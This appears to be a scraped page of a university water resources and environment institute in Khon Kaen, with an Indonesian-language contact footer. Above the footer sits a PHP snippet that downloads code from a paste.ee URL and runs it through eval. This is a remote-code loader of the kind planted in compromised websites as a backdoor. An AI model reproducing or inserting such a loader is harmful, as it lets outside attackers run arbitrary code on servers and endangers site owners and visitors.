<?php
$url = "https://paste.ee/r/IfYQM/0";
 
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);
 
if ($result === false) {
    echo "Error";
} else {
    if (is_string($result)) {
        ob_start();
        eval('?>'.$result);
        $output = ob_get_clean();
        echo $output;
    } else {
        echo "Error";
    }
}
 
curl_close($ch);

?>    

 

Institut Sumber Daya Air dan Lingkungan
Fakultas Teknik Universitas Khon Kaen

Lantai 2, Ruang 3, Gedung CB (EN 09)
123 Mitraphap Road, Kecamatan Nai Mueang, Kabupaten Mueang, Provinsi Khon Kaen 40002
Telepon 0 4320 2474 Fax  0 4320 2474  email : This email address is being protected from spambots. You need JavaScript enabled to view it.
 

Additional information